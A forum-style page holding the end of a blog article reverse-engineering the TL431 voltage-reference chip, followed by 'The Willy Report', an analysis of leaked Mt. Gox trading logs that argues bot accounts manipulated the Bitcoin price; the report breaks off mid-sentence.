trim the resistors[/h] One feature of the TL431 that I didn't expect is fuses for trimming the resistances. During manufacture of the chips, these fuses can be blown to adjust the resistances to increase the accuracy of the chip. Some more expensive chips have laser-trimmed resistors, where a laser burns away part of the resistor before the chip is packaged, providing more control than a fuse. The die photo below shows one of the fuse circuits. There is a small resistor (actually two parallel resistors) in parallel with a fuse. Normally, the fuse causes the resistor to be bypassed. During manufacture, the characteristics of the chip can be measured. If more resistance is required, two probes contact the pads and apply a high current. This will blow the fuse, adding the small resistance to the circuit. Thus, the resistance in the final circuit can be slightly adjusted to improve the chip's accuracy. A trimming fuse in the TL431. [h=3]Capacitors[/h] The TL431 contains two capacitors internally, and they are implemented in very different ways. The first capacitor (under the TLR431A text) is a is formed from a reverse-biased diode (the reddish and purple stripes). The junction of a reverse-biased diode has capacitance, which can be used to form a capacitor (details). One limitation of this type of capacitor is the capacitance varies with voltage because the junction width changes. A junction capacitor in the TL431 chip with interdigitated PN junctions. The die id is written in metal on top. The second capacitor is formed in an entirely different manner, and is more like a traditional capacitor with two plates. There's not much to see: it has a large metal plate with the N+ silicon underneath acting as the second plate. The shape is irregular, to fit around other parts of the circuit. This capacitor takes up about 14% of the die, illustrating that capacitors use space very inefficiently in integrated circuits. The datasheet indicates these capacitors are each 20 pF; I don't know if this is the real value or not. A capacitor in the TL431 chip. [h=2]The TL431 chip reverse-engineered[/h] The TL431 die, labeled. The diagram above indicates the components on the die of the TL431, labeled to correspond to the schematic below. From the earlier discussion, the structure of each component should be clear. The three pins of the chip are connected to the "ref", "anode", and "cathode" pads. The chip has a single layer of metal (yellowish-white) that connects the components. The schematic shows resistances in terms of an unknown scale factor R; 100 ? is probably a reasonable value for R, but I don't know the exact value. One big surprise from looking at the die is the component values are very different from the values in previously-published schematics. These values fundamentally affect how the bandgap voltage reference work.[9] Internal schematic of the TL431 [h=2]How the chip works[/h] Externally, the TL431's operation is straightforward. If the voltage on the ref pin input goes above 2.5 volts, the output transistor conducts, causing current flow between the cathode and anode pins. In a power supply, this increase in current flow signals the power supply control chip (indirectly), causing it to reduce the power which will bring the voltage back to the desired level. Thus, the power supply uses the TL431 to keep the output voltage stable. I'll give a brief summary of the chip's internal operation here, and write up a detailed explanation later. The most interesting part of the chip is the temperature-compensated bandgap voltage reference.[10] The key to this is seen by looking at the die: transistor Q5 has 8 times the emitter area as Q4, so the two transistors are affected differently by temperature. The outputs of these transistors are combined by R2, R3, and R4 in the right ratio to cancel out the effects of temperature, forming a stable reference.[11][12] The voltages from the temperature-stabilized bandgap are sent into the comparator, which has inputs Q6 and Q1; Q8 and Q9 drive the comparator. Finally, the output of the comparator goes through Q10 to drive the output transistor Q11. [h=2]Decapping the TL431 the low tech way[/h] Getting an IC die photo usually involves dissolving the chip in dangerous acids and then photographing the die with an expensive metallurgical microscope. (Zeptobars describes their process here). I wondered what I'd end up with if I just smashed a TL431 open with Vise-Grip pliers and took a look with a cheap microscope. I broke the die in half in the process, but still got some interesting results. The picture below shows the large copper anode inside the package, which acts as a heat sink. Next to this is (most of ) the die, which is normally mounted on the copper anode where the white circle is. Note how much smaller the die is than the package. The TL431 package, the internal anode, and most of the die. Using a basic microscope, I obtained the photo below. While the picture doesn't have the same quality as Zeptobars', it shows the structure of the chip better than I expected. This experiment shows that you can do a basic level of chip decapping and die photography without messing around with dangerous acids. From this photo I can see that the cheap TL431s I ordered off eBay are identical to the one Zeptobars decapped. Since the Zeptobars chip didn't match published schematics, I wondered if they ended up with a strange variant chip variant, but apparently not. Piece of the TL431 die, photographed through a microscope. [h=2]Conclusion[/h] Is the TL431 really the most popular IC people haven't heard of? There's no way to know for sure, but I think it's a good candidate. Nobody seems to publish data on which ICs are produced in largest quantities. Some sources say the 555 timer is the most popular chip with a billion produced every year (which seems improbably high to me). The TL431 must be high up the popularity list - you probably have a TL431 within arms-reach right now (in your phone charger, laptop power adapter, PC power supply, or monitor). The difference is that chips such as the 555 and 741 are so well-known that they are almost part of pop culture with books, T-shirts and even mugs. But unless you've worked on power supplies, chances are you've never heard of the TL431. Thus, the TL431 gets my vote for the most common IC that people are unaware of. If you have other suggestions for ICs that don't get the attention they deserve, leave a comment. [h=2]Acknowledgments[/h] The die photos are by Zeptobars (except the photo I took). The schematic and analysis are heavily based on Cristophe Basso's work.[12] The analysis benefited from discussion with the Visual 6502 group, in particular B. Engl. [h=2]Notes and references[/h] [1] Because the TL431 has an unusual function, there's no standard name for its function. Different datasheets describe it as a "adjustable shunt regulator", a "programmable precision reference", a programmable shunt voltage reference", and a "programmable zener". [2] I dug up some history on the origins of the TL431 from Texas Instruments' Voltage Regulator Handbook (1977). The precursor chip, the TL430, was introduced as an adjustable shunt regulator in 1976 The TL431 was created as an improvement to TL430 with better accuracy and stability and was called a precision adjustable shunt regulator. The TL431 was announced as a future product in 1977 and launched in 1978. Another future product that TI announced in 1977 was the TL432, which was going to be "Timer/Regulator/Comparator Building Blocks", containing a voltage reference, comparator, and booster transistor in one package. preliminary datasheet. But when the TL432 came out, the "building block" plan had been abandoned. The TL432 ended up being merely a TL431 with the pins in a different order, to help PC board layout. datasheet. [3] Modern ATX power supplies (example, example) often contain three TL431s. One provides feedback for the standby power supply, another provides feedback for the main power supply, and a third is used as a linear regulator for the 3.3V output. [4] It's interesting to look at the switching power supplies that don't use the TL431. Earlier switching power supplies typically used a Zener diode as a voltage reference. The earliest Apple II power supplies used a Zener diode as the voltage reference (Astec AA11040), but this was soon replaced by a TL431 in the Astec AA11040-B revision. The Commodore CBM-II model B used a TL430 instead of TL431, which is an unusual choice. The original IBM PC power supply used a Zener diode for reference (along with many op amps). Later PC power supplies often used the TL494 PWM controller, which contained its own voltage reference and operated on the secondary side. Other ATX power supplies used the SG6105 which included two TL431s internally. Phone chargers usually use the TL431. Inexpensive knockoffs are an exception; they often use a Zener diode instead to save a few cents. Another exception is chargers such as the iPad charger, which use primary-side regulation and don't use any voltage feedback from the output at all. See my article on power supply history for more information. [5] The TL431 is available in a larger variety of packages than I'd expect. Two of the photos show the TL431 in a transistor-like package with three leads (TO-92). The remaining photos show the surface-mounted SOT23-3 package. The TL431 also comes in 4-pin, 5-pin, 6-pin, or 8-pin surface-mounted packages (SOT-89, SOT23-5, SOT323-6, SO-8 or MSOP-8), as well as a larger package like a power transistor (TO-252) or an 8-pin IC package (DIP-8). (pictures). [6] For more information on how bipolar transistors are implemented in silicon, there are many sources. Semiconductor Technology gives a good overview of NPN transistor construction. Basic Integrated Circuit Processing is a presentation that describes transistor fabrication in great detail. The Wikipedia diagram is also useful. [7] You might have wondered why there is a distinction between the collector and emitter of a transistor, when the simple picture of a transistor is totally symmetrical. Both connect to an N layer, so why does it matter? As you can see from the die photo, the collector and emitter are very different in a real transistor. In addition to the very large size difference, the silicon doping is different. The result is a transistor will have poor gain if the collector and emitter are swapped. [8] The PNP transistors in the TL431 have a circular structure that gives them a very different appearance from the NPN transistors. The circular structure used for PNP transistors in the TL431 is illustrated in Designing Analog Chips by Hans Camenzind, who was the designer of the 555 timer. If you want to know more about analog chips work, I strongly recommend Camenzind's book, which explains analog circuits in detail with a minimum of mathematics. Download the free PDF or get the printed version. The structure of a PNP transistor is also explained in Principles of Semiconductor Devices. Analysis and Design of Analog Integrated Circuits provides detailed models of bipolar transistors and how they are fabricated in ICs. [9] The transistors and resistors in the die I examined have very different values from values others have published. These values fundamentally affect the operation of the bandgap voltage reference. Specifically, previous schematics show R2 and R3 in a 1:3 ratio, and Q5 has 2 times the emitter area as Q6. Looking at the die photo, R2 and R3 are equal, and Q5 has 8 times the emitter area as Q4. These ratios result in a different ?Vbe. To compensate for this, R1 and R4 are different between previous schematics and the die photo. I will explain this in detail in a later article, but to summarize Vref = 2*Vbe + (2*R1+R2)/R4 * ?Vbe, which works out to about 2.5 volts. Note that the ratio of the resistances matters, not the values; this helps counteract the poor resistor tolerances in a chip. In the die, Q8 is formed from two transistors in parallel. I would expect Q8 and Q9 to be identical to form a balanced comparator, so I don't understand the motivation behind this. My leading theory is this adjusts the reference voltage up slightly to hit 2.5V. B. Engl suggests this may help the device operate better at low voltage. [10] I won't go into the details of a bandgap reference here, except to mention that it sounds like some crazy quantum device, but it's really just a couple transistors. For more information on how a bandgap reference works, see How to make a bandgap voltage reference in one easy lesson by Paul Brokaw, inventor of the Brokaw bandgap reference. A presentation on the bandgap reference is here. [11] In a sense, the bandgap circuit in the TL431 operates "backwards" to a regular bandgap voltage reference. A normal bandgap circuit provides the necessary emitter voltages to produce the desired voltage as output. The TL431's circuit takes the reference voltage as input, and the emitter voltages are used as outputs to the comparator. In other words, contrary to the block diagram, there is not a stable voltage reference inside the TL431 that is compared to the ref input. Instead, the ref input generates two signals to the comparator that match when the input is 2.5 volts. [12] There are many articles about the TL431, but they tend to be very technical, expecting a background in control theory, Bode plots, etc. The TL431 in Switch-Mode Power Supplies loops is a classic TL431 paper by Christophe Basso and Petr Kadanka. This explains the TL431 from the internals through loop compensation to an actual power supply. It includes a detailed schematic and description of how the TL431 operates internally. Other related articles are at powerelectronics.com. Designing with the TL431, Ray Ridley, Switching Power Magazine is a detailed explanation of how to use the TL431 for power supply feedback, and the details of loop compensation. The TL431 in the Control of Switching Power Supplies is a detailed presentation from ON Semiconductor. The TL431 datasheet includes a schematic of the chip's internals. Strangely, the resistances on this schematic are very different from what can be seen from the die. Sursa: Ken Shirriff's blog: Reverse-engineering the TL431: the most common chip you've never heard of
  16. The Willy Report: proof of massive fraudulent trading activity at Mt. Gox, and how it has affected the price of Bitcoin Posted on May 25, 2014 by willyreport Somewhere in December 2013, a number of traders including myself began noticing suspicious bot behavior on Mt. Gox. Basically, a random number between 10 and 20 bitcoin would be bought every 5-10 minutes, non-stop, for at least a month on end until the end of January. The bot was dubbed “Willy” at some point, which is the name I’ll continue to use here. Since Willy was buying in such a recognizable pattern, I figured it would be easy to find in the Mt. Gox trading logs that were leaked about two months ago (there’s a torrent of the data here). However, the logs only went as far as November 2013; luckily, I was able to detect the buying pattern in the last few days of November. Below is a compiled log of its trades on the last two days of November (from the file “2013-11_mtgox_japan.csv”): 29-11-2013 0:07 - UID: 817985 Type: buy Currency: USD BTC: 16.61124644 Fiat: 18709.31 29-11-2013 0:12 - UID: 817985 Type: buy Currency: USD BTC: 17.49854918 Fiat: 19402.8 29-11-2013 0:20 - UID: 817985 Type: buy Currency: USD BTC: 12.01301395 Fiat: 13346.46 29-11-2013 0:30 - UID: 817985 Type: buy Currency: USD BTC: 14.04190796 Fiat: 15172.05 ... 30-11-2013 9:51 - UID: 832432 Type: buy Currency: USD BTC: 17.57018627 Fiat: 21330.73 30-11-2013 10:01 - UID: 832432 Type: buy Currency: USD BTC: 19.90458956 Fiat: 24212.63 30-11-2013 10:10 - UID: 832432 Type: buy Currency: USD BTC: 14.011528 Fiat: 16893.82 30-11-2013 10:19 - UID: 832432 Type: buy Currency: USD BTC: 16.18210837 Fiat: 19561.92 30-11-2013 10:29 - UID: 832432 Type: buy Currency: USD BTC: 18.34173105 Fiat: 22136.74 30-11-2013 10:35 - UID: 832432 Type: buy Currency: USD BTC: 18.19262893 Fiat: 21885.52 30-11-2013 10:45 - UID: 832432 Type: buy Currency: USD BTC: 11.24527636 Fiat: 13492.78 30-11-2013 10:52 - UID: 832432 Type: buy Currency: USD BTC: 14.5141487 Fiat: 17416.93 30-11-2013 10:58 - UID: 832432 Type: buy Currency: USD BTC: 15.805611 Fiat: 18978.39 30-11-2013 11:06 - UID: 832432 Type: buy Currency: USD BTC: 14.96578741 Fiat: 18108.31 30-11-2013 11:13 - UID: 832432 Type: buy Currency: USD BTC: 18.49346572 Fiat: 22412.65 30-11-2013 11:18 - UID: 832432 Type: buy Currency: USD BTC: 12.77630467 Fiat: 15500.85 30-11-2013 11:25 - UID: 832432 Type: buy Currency: USD BTC: 13.70319422 Fiat: 16621.72 30-11-2013 11:35 - UID: 832432 Type: buy Currency: USD BTC: 14.95640049 Fiat: 18120.95 30-11-2013 11:41 - UID: 832432 Type: buy Currency: USD BTC: 15.29944656 Fiat: 18544.72 30-11-2013 11:51 - UID: 832432 Type: buy Currency: USD BTC: 14.10583655 Fiat: 17073.18 30-11-2013 11:58 - UID: 832432 Type: buy Currency: USD BTC: 14.50627441 Fiat: 17560.1 30-11-2013 12:03 - UID: 832432 Type: buy Currency: USD BTC: 13.07979536 Fiat: 15865.66 30-11-2013 12:13 - UID: 832432 Type: buy Currency: USD BTC: 11.88053668 Fiat: 14411.04 30-11-2013 12:20 - UID: 832432 Type: buy Currency: USD BTC: 11.46523059 Fiat: 13913.0 30-11-2013 12:30 - UID: 832432 Type: buy Currency: USD BTC: 19.89610521 Fiat: 24187.39 Some notes on how I obtained this data: first, I removed all exact duplicate entries from the log. As noted in an earlier analysis, trades that involved a user ID “THK” – whose likely role was to facilitate cross-currency trades – were erroneously duplicated in the logs. Second, since the log contains an entry for each individual user-to-user trade, I aggregated every pair of trades involving the same user that occurred within 2 seconds from each other, assuming these belonged to the same market buy/sell (2 seconds to account for trading engine lag, which God knows was sometimes enormous on Mt. Gox). You may note that these are actually multiple user IDs (denoted with “UID”); Willy was not a single account, its trading activity was spread over many accounts. Perhaps this is why others had been unable to find him in the database: there were plenty of people who knew of its existence (in fact the OP of this thread allegedly coined the name “Willy”). I noticed here that all of these accounts had one thing in common; the User_Country and User_State field both had “??” as entry. This was unusual. Normally, these fields contained country/state FIPS codes (for verified users?), nothing (unverified users?), or “!!” (users who failed verification or suspicious users?). So I went back and gathered all of these “??” users, aggregated their trades, and summed the amount of BTC that each of these accounts bought (they never performed a single sell). They seamlessly connected to each other: when one user became inactive, the next became active usually within a few hours. Their trading activity went back all the way to September 27th. The full record of trades you can see below: 27-9-2013 13:41 - UID: 807884 Type: buy Currency: USD BTC: 37.77728716 Fiat: 5183.15 27-9-2013 13:42 - UID: 807884 Type: buy Currency: USD BTC: 77.11243579 Fiat: 10615.65 27-9-2013 13:50 - UID: 807884 Type: buy Currency: USD BTC: 124.3094863 Fiat: 17103.01 27-9-2013 13:58 - UID: 807884 Type: buy Currency: USD BTC: 66.22492678 Fiat: 9138.56 27-9-2013 14:05 - UID: 807884 Type: buy Currency: USD BTC: 14.4184561 Fiat: 1988.84 89.43131133 Fiat: 16829.5 4-11-2013 7:44 - UID: 689932 Type: buy Currency: USD BTC: 7.32852211 Fiat: 1648.9 4-11-2013 7:56 - UID: 689932 Type: buy Currency: USD BTC: 10.79379575 Fiat: 2428.6 4-11-2013 8:10 - UID: 689932 Type: buy Currency: USD BTC: 2.6025479 Fiat: 585.31 4-11-2013 8:22 - UID: 689932 Type: buy Currency: USD BTC: 26.14091662 Fiat: 5872.67 ... 30-11-2013 9:27 - UID: 832432 Type: buy Currency: USD BTC: 18.03343411 Fiat: 21838.91 30-11-2013 9:33 - UID: 832432 Type: buy Currency: USD BTC: 13.21652953 Fiat: 16041.43 30-11-2013 9:44 - UID: 832432 Type: buy Currency: USD BTC: 17.46274022 Fiat: 21268.82 30-11-2013 9:51 - UID: 832432 Type: buy Currency: USD BTC: 17.57018627 Fiat: 21330.73 30-11-2013 10:01 - UID: 832432 Type: buy Currency: USD BTC: 19.90458956 Fiat: 24212.63 30-11-2013 10:10 - UID: 832432 Type: buy Currency: USD BTC: 14.011528 Fiat: 16893.82 30-11-2013 10:19 - UID: 832432 Type: buy Currency: USD BTC: 16.18210837 Fiat: 19561.92 30-11-2013 10:29 - UID: 832432 Type: buy Currency: USD BTC: 18.34173105 Fiat: 22136.74 30-11-2013 10:35 - UID: 832432 Type: buy Currency: USD BTC: 18.19262893 Fiat: 21885.52 30-11-2013 10:45 - UID: 832432 Type: buy Currency: USD BTC: 11.24527636 Fiat: 13492.78 30-11-2013 10:52 - UID: 832432 Type: buy Currency: USD BTC: 14.5141487 Fiat: 17416.93 30-11-2013 10:58 - UID: 832432 Type: buy Currency: USD BTC: 15.805611 Fiat: 18978.39 30-11-2013 11:06 - UID: 832432 Type: buy Currency: USD BTC: 14.96578741 Fiat: 18108.31 30-11-2013 11:13 - UID: 832432 Type: buy Currency: USD BTC: 18.49346572 Fiat: 22412.65 30-11-2013 11:18 - UID: 832432 Type: buy Currency: USD BTC: 12.77630467 Fiat: 15500.85 30-11-2013 11:25 - UID: 832432 Type: buy Currency: USD BTC: 13.70319422 Fiat: 16621.72 30-11-2013 11:35 - UID: 832432 Type: buy Currency: USD BTC: 14.95640049 Fiat: 18120.95 30-11-2013 11:41 - UID: 832432 Type: buy Currency: USD BTC: 15.29944656 Fiat: 18544.72 30-11-2013 11:51 - UID: 832432 Type: buy Currency: USD BTC: 14.10583655 Fiat: 17073.18 30-11-2013 11:58 - UID: 832432 Type: buy Currency: USD BTC: 14.50627441 Fiat: 17560.1 30-11-2013 12:03 - UID: 832432 Type: buy Currency: USD BTC: 13.07979536 Fiat: 15865.66 30-11-2013 12:13 - UID: 832432 Type: buy Currency: USD BTC: 11.88053668 Fiat: 14411.04 30-11-2013 12:20 - UID: 832432 Type: buy Currency: USD BTC: 11.46523059 Fiat: 13913.0 30-11-2013 12:30 - UID: 832432 Type: buy Currency: USD BTC: 19.89610521 Fiat: 24187.39 And a compilation of when each account was active, how much BTC they bought, and how much USD they spent, with some totals at the bottom: User_ID: 807884 User: a6e1c702-e6b2-4585-bdaf-d1f00e6e7db2 Start: 27-9-2013 13:41 End: 1-10-2013 0:30 BTC bought: 17650.499699839987 USD spent: 2500000.0 User_ID: 658152 User: c1ac7aeb-ac34-49cd-8363-c4bcb36a2b9f Start: 10-10-2013 0:49 End: 15-10-2013 1:53 BTC bought: 17348.26542219 USD spent: 2500000.0 User_ID: 659582 User: b337d02a-ccd5-4323-933d-35e59d228825 Start: 16-10-2013 1:45 End: 18-10-2013 11:14 BTC bought: 15695.016063759997 USD spent: 2500000.0 User_ID: 661608 User: 8bb6ff26-6075-42d3-86d5-57479005393f Start: 18-10-2013 11:19 End: 22-10-2013 9:06 BTC bought: 14137.102515370016 USD spent: 2500000.0 User_ID: 665654 User: cd028348-2fab-4d27-918e-7bdb1b5c0f87 Start: 22-10-2013 22:41 End: 24-10-2013 14:24 BTC bought: 11785.470819779992 USD spent: 2500000.0 User_ID: 683148 User: ec41774a-40f3-4137-ad10-485f5a908713 Start: 31-10-2013 14:44 End: 3-11-2013 19:18 BTC bought: 2338.136038199999 USD spent: 500000.0 User_ID: 689932 User: 5b9a963d-5464-4e51-8cc9-5111a720438e Start: 3-11-2013 21:47 End: 5-11-2013 7:48 BTC bought: 4295.211475280002 USD spent: 1000000.0 ... User_ID: 825654 User: f9fc16dd-3010-4104-8c71-077596189e38 Start: 29-11-2013 13:45 End: 30-11-2013 4:18 BTC bought: 2090.5948831200003 USD spent: 2500000.0 User_ID: 832432 User: 26d62882-06c0-4e0e-a79d-3ea8592f490b Start: 30-11-2013 7:25 End: 30-11-2013 12:30 BTC bought: 638.5403779799999 USD spent: 770744.48 Total BTC bought: 268132.73433409 Total USD spent: $111,770,744.48 So basically, each time, (1) an account was created, (2) the account spent some very exact amount of USD to market-buy coins ($2,500,000 was most common), (3) a new account was created very shortly after. Repeat. In total, a staggering ~$112 million was spent to buy close to 270,000 BTC – the bulk of which was bought in November. So if you were wondering how Bitcoin suddenly appreciated in value by a factor of 10 within the span of one month, well, this is why. Not Chinese investors, not the Silkroad bust – these events may have contributed, but they certainly were not the main reason. But more on that later. At this point, I noticed that the first Willy account (created on September 27th) unlike all the others had some crazy high user ID: 807884, even though regular accounts at that point only went up to 650000 or so. So I went looking for other unusually high user IDs within that month, and lo and behold, there was another time-traveller account with an ID of 698630 – and this account, after being active for close to 8 months, became completely inactive just 7 hours before the first Willy account became active! So it is a reasonable assumption that these accounts were controlled by the same entity. Account 698630 actually had a registered country and state: “JP”, “40? – the FIPS code for Tokyo, Japan. So I went and compiled all trades for this account. For convenience, I will dub this user “Markus”. Its trades are as follows: 14-2-2013 3:37 - UID: 698630 Type: buy Currency: USD BTC: 2500.00000006 Fiat: 6600.01 14-2-2013 3:37 - UID: 698630 Type: buy Currency: USD BTC: 2500.00000003 Fiat: 258373.84 14-2-2013 3:39 - UID: 698630 Type: buy Currency: USD BTC: 500.0 Fiat: 187.76 14-2-2013 3:42 - UID: 698630 Type: buy Currency: USD BTC: 500.00000003 Fiat: 16.06 14-2-2013 3:53 - UID: 698630 Type: buy Currency: USD BTC: 500.0 Fiat: 2279.47 ... 27-9-2013 4:16 - UID: 698630 Type: buy Currency: USD BTC: 113.51156404 Fiat: 7339.57 27-9-2013 4:37 - UID: 698630 Type: buy Currency: USD BTC: 23.27049209 Fiat: 708.08 27-9-2013 5:32 - UID: 698630 Type: buy Currency: USD BTC: 104.28667388 Fiat: 5482.4 27-9-2013 6:14 - UID: 698630 Type: buy Currency: EUR BTC: 1.0 Fiat: 100.46 27-9-2013 6:14 - UID: 698630 Type: buy Currency: EUR BTC: 10.0 Fiat: 1005.0 27-9-2013 6:14 - UID: 698630 Type: buy Currency: EUR BTC: 10.0 Fiat: 1005.0 27-9-2013 6:14 - UID: 698630 Type: sell Currency: USD BTC: 5.0 Fiat: 685.25 27-9-2013 6:15 - UID: 698630 Type: sell Currency: USD BTC: 0.5 Fiat: 68.53 27-9-2013 6:15 - UID: 698630 Type: sell Currency: USD BTC: 2.0 Fiat: 274.1 27-9-2013 6:15 - UID: 698630 Type: sell Currency: USD BTC: 1.0 Fiat: 137.05 27-9-2013 6:15 - UID: 698630 Type: buy Currency: USD BTC: 5.0 Fiat: 689.74 27-9-2013 6:16 - UID: 698630 Type: buy Currency: USD BTC: 3.44197225 Fiat: 475.2 There were several peculiar things about Markus. First, its fees paid were always 0. Second, its fiat spent when buying coins was all over the place, with seemingly completely random prices paid per bitcoin. For reference, Markus is the “Glitch in the System” user in this excellent Gox DB visualization (on that note, all of the Willy accounts are the “Greater Fools” with just big green blotches around Oct-Nov). Upon further inspection of the log, it became clear what was the cause of these seemingly random values: In this table, the first two trades (buy/sell pairs) are by some regular user with ID 238168. In the second trade, this user buys 0.398 BTC for $15.13. The next trade is some large market buy by Markus (ID 698630): note how the “$15.13? value from the previous trade seems to “stick”; regardless of the volume of BTC bought, the value paid is always $15.13. This is speculation, but perhaps for Markus, the “Money” spent field is in fact empty, and the program that generates the trading logs simply takes whatever value was already there before. In other words, Markus is somehow buying tons of BTC without spending a dime. Interestingly, Markus also sells every now and then, and for some reason the price values are correct this case. His biggest sell occurred on June 2nd. I’ve analyzed these trades separately here: 2-6-2013 8:22 - UID: 698630 Type: sell Currency: USD BTC: 1998.98799992 Fiat: 254788.4 2-6-2013 8:23 - UID: 698630 Type: sell Currency: USD BTC: 999.99999997 Fiat: 127026.48 2-6-2013 8:23 - UID: 698630 Type: sell Currency: USD BTC: 1000.0 Fiat: 127002.4 2-6-2013 8:24 - UID: 698630 Type: sell Currency: USD BTC: 1000.0 Fiat: 127018.51 2-6-2013 8:24 - UID: 698630 Type: sell Currency: USD BTC: 1000.0 Fiat: 127001.35 2-6-2013 8:24 - UID: 698630 Type: sell Currency: USD BTC: 1000.00000005 Fiat: 127004.44 ... 2-6-2013 9:46 - UID: 698630 Type: buy Currency: USD BTC: 11.0 Fiat: 170.94 2-6-2013 9:46 - UID: 698630 Type: buy Currency: USD BTC: 0.02492337 Fiat: 85.47 2-6-2013 9:46 - UID: 698630 Type: buy Currency: USD BTC: 2.01257589 Fiat: 170.94 2-6-2013 9:46 - UID: 698630 Type: buy Currency: USD BTC: 4.0 Fiat: 97.81 2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 300.41544653 Fiat: 293.43 2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 14.99143981 Fiat: 2145.37 2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 50.02492337 Fiat: 277.66 2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 453.70848748 Fiat: 31294.09 2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 113.56988903 Fiat: 20.54 2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 0.0747685 Fiat: 2.93 Totals: Start: 2-6-2013 8:22 End: 2-6-2013 9:47 User_ID: 698630 User: b2853e3c-3ec0-4fa5-8231-d21e2fd13330 BTC bought: 14770.555715840008 USD spent: $??.?? BTC sold: 31579.33902558999 USD received: $3,813,128.10 Net BTC sold: 16808.783309749982 Net USD received: $3,813,128.10 - $??.?? Sell 31k BTC, receive $4 million, re-buy 15k BTC, spend nothing. Awesome! Here is the corresponding chart for this day, just to show that these trades (from 8:00 to 10:00 am) actually occurred “on-market”, and had a significant effect on the price. Some totals compiled for Markus: Start: 14-2-2013 3:37 End: 27-9-2013 6:16 User_ID: 698630 User: b2853e3c-3ec0-4fa5-8231-d21e2fd13330 BTC bought: 335203.83080579044 USD spent: $??.?? JPY spent: 0.0 EUR spent: €2110.46 BTC sold: 37575.39028677996 USD received: $4,018,376.87 JPY received: ¥2,744,463.91 EUR received: 0.0 Net BTC bought: 297628.4405190105 Net USD spent: $??.?? - $4,018,376.87 Another net ~300,000 BTC bought. Combined with Willy’s buys, that’s around 570,000 BTC in total. Although there are no trading logs after November, Willy was observed by multiple traders to be active for the most part of December until the end of January as well. Although this was at a slower, more consistent pace (around 2000 BTC per day), it should roughly add up to another 80,000 BTC or so bought. So that’s a total that’s suspiciously close to the supposedly lost ~650,000 BTC. So… hacker, or inside job? At this point, I guess the straightforward conclusion would be that this is how the coins were stolen: a hacker gained access to the system or database, was able to assign himself accounts with any amount of USD at will, and just started buying and withdrawing away. This is in line with what GoxDox.org reported last month (they leaked the Sunlot court filing, so clearly they have some inside info). After all, the constant creation of new Willy accounts seems almost intended to avoid detection. Unverified BTC withdrawals may have been possible until late 2013 (I could not find any exact data on this), or perhaps the “??” location values in the database (unlike the usual empty or “!!” values for unverified users) were able to fool the system into thinking this user was verified. However, there are a lot of things that don’t add up with this theory; in fact there is a ton of evidence to suggest that all of these accounts were controlled by Mt. Gox themselves. First, the obvious: Markus has Tokyo, Japan as its registered location. But any hacker could edit a DB entry to try and frame someone (or even be located in Tokyo, however unlikely). However, none of the Willy accounts until November appear in the leaked balance summary at the time of collapse, and there seem to be no corresponding withdrawals for those amounts of bitcoin bought. Markus does have a balance: around 20 BTC and small amounts of EUR, JPY and PLN. No USD balance. In other words, only currencies for which Mt. Gox actively controlled bank accounts. The next piece of evidence is perhaps more convincing. For some months in 2013, there were two versions of trading logs in the leaked database: a full log, and an anonymized log with user hashes and country/state codes removed. For April 2013, there was a .zip file which contained one such anonymized log – this is speculation, but one use of this may have been to send off to auditors/investors to show some internals. Upon closer inspection, it turns out the full and anonymized versions of all the logs differ in two, and ONLY two ways: User hashes and country/state codes are removed. Markus’ out-of-place user ID (698630) is changed to a small number (634), and its strange fixed “Money” values are corrected to the expected values. Interesting detail: from the 2011 leaked account list, the user with ID 634 has username “MagicalTux”. Compare these two tables: The “fixed” file has an earlier creation date than the full log, so it could not have been a reporting bug that was fixed later. Everything points to these values having been manually edited, presumably to erase traces of suspicious activity. Although another possibility is that it is actually the other way around – the correct log with earlier creation date was the original, and all other logs have been altered to a different ID not traceable to MagicalTux to cover up fraud in a very lazy way (by setting all Money spent to whatever was the last trade), and someone forgot there was still a zip file lying around with the unaltered data. Another thing: Willy seemed to be immune to network downtime. The latest four trades displayed in the bottom-right corner showcase Willy’s typical trading activity observed from December onwards: a 10-20 BTC buy every 5-10 minutes. At a time no one else was able to trade, be it via API or otherwise, Willy was somehow able to continue as if nothing ever happened. This makes it likely the bot was being run from a local Mt. Gox server. It is not impossible that a hacker was able to install some kind of rootkit on Mt. Gox’s servers and ran the bot from there, but that seems extremely unlikely. Before Markus Of course, I was curious to see if the April 2013 bubble was just as fake as the November 2013 bubble was (as should be evident from the above data, and the more detailed price analysis below). Although I could find no clear single buy bot active during the February-April run up (Markus bought a significant amount of coins, but not enough to sustain the prolonged rally), there was still tons of suspicious activity in the log. When browsing through the trading data sorted by user ID, I noticed a huge number of active “Japan” users with very low user IDs (<1000). None were paying fees. Odd to say the least, so I investigated further. Turns out a lot of these trades followed a very distinct pattern, and were unlikely to have been executed by their original account holders, but rather these accounts were “hijacked” in some way. The image below shows an example of this pattern: First, a user with ID 179200 (highlighted; it is always this user as far as I can tell) buys some very exact amount of JPY worth of BTC (in this case JPY 24000) from regular users. Immediately after, a mysterious low-ID JP user also buys up some exact amount of JPY worth of BTC (always several times more than what user 179200 bought). This happens over and over again, for different low-ID users. But here’s the interesting thing: the user _hashes_ for these low ID JP users do not add up with the user hashes of the original account holders. Look at this: The data is sorted by user ID. Highlighted is the likely original, legit user making a legit trade. The hash is different from the fraudulent user (who has “JP” as region and does not pay fees). This rules out that these were inactive accounts being liquidated (the Mt. Gox terms of service stated they had the right to close accounts inactive for longer than 6 months). And as I said, these were not isolated cases. The first incidence seems to have been on August 9th, 2012, 08:54:58 GMT. These users were especially actively buying until April 2013, probably tens if not hundreds of thousands of coins (I haven’t analyzed that far) although sometimes selling (for JPY) as well. From May 2013 they became less active (to the point of insignificance for price movement), buying smaller amounts until July or so, when they start selling more than buying. The activity continues until the end of the data (November 2013). Interestingly, there was a post by MagicalTux on bitcointalk.org about him finding and fixing a bug, at a point in time about five hours after the first incidence of this phenomenon. And as it happens, most of these “hijacker” user hashes appear in the final balances file; all have only some very small JPY balance. So they at least satisfy the first two conditions for triggering the bug explained in that post. There is a possibility that the bug was not fully fixed and that this activity was an exploit of it. After Willy – Speculation Since there are no logs past November 2013, the following arguments are largely based on personal speculation, and that of other traders, with less hard evidence attached to them. Take them however you will. I’m sure a lot of this will be proven wrong, but hopefully it will give some insight into what transpired in Mt. Gox’s final days. Based on my own personal observations, Willy continued to be active until January 26th: buying up 10-20 BTC every 5-10 minutes, for around 100 BTC per hour. It was not active all the time, 